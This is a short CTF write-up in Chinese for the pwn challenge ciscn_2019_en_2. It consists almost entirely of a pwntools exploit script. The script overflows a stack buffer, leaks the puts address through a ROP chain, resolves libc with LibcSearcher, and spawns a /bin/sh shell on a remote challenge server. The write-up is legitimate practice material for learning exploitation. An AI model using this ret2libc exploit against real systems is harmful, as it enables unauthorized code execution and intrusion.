Pwn - ciscn_2019_en_2 - 《PeiQi-CTF-WiKi》

跟之前的 ciscn_2019_c_1 相似
from pwn import *
from LibcSearcher import *
content = 0
context(os='linux', arch='amd64', log_level='debug')
ret = 0x4006b9
elf = ELF('ciscn_2019_en_2')
puts_plt = elf.plt["puts"] 
puts_got = elf.got['puts']
main_addr = elf.symbols["main"]
pop_rdi_ret = 0x400c83
def main():
    if content == 1:
        peiqi = process('ciscn_2019_en_2')
    else:    
        peiqi = remote('node3.buuoj.cn',28445)
    payload = b'a' * (0x50 + 8)
    payload = payload + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) 
    payload = payload + p64(main_addr)
    #print(payload)
    peiqi.sendlineafter("Input your choice!\n", '1')
    peiqi.sendlineafter("Input your Plaintext to be encrypted\n", payload)
    peiqi.recvuntil('Ciphertext\n')
    peiqi.recvline()
    puts_addr = peiqi.recv(7)[:-1]
    puts_addr = u64(puts_addr.ljust(8,b'\x00'))
    print(puts_addr)
    libc = LibcSearcher('puts', puts_addr)
    libc_base     = puts_addr - libc.dump('puts')
    system_addr = libc_base + libc.dump('system')
    binsh_addr  = libc_base + libc.dump('str_bin_sh')    
    payload = b'a' * (0x50 + 8)
    payload = payload + p64(ret) + p64(pop_rdi_ret) + p64(binsh_addr) + p64(system_addr)
    peiqi.sendlineafter("Input your choice!\n", '1')
    peiqi.sendlineafter("Input your Plaintext to be encrypted\n", payload)
    peiqi.interactive()
main()
同样是要注意 ubuntu8 的对齐栈问题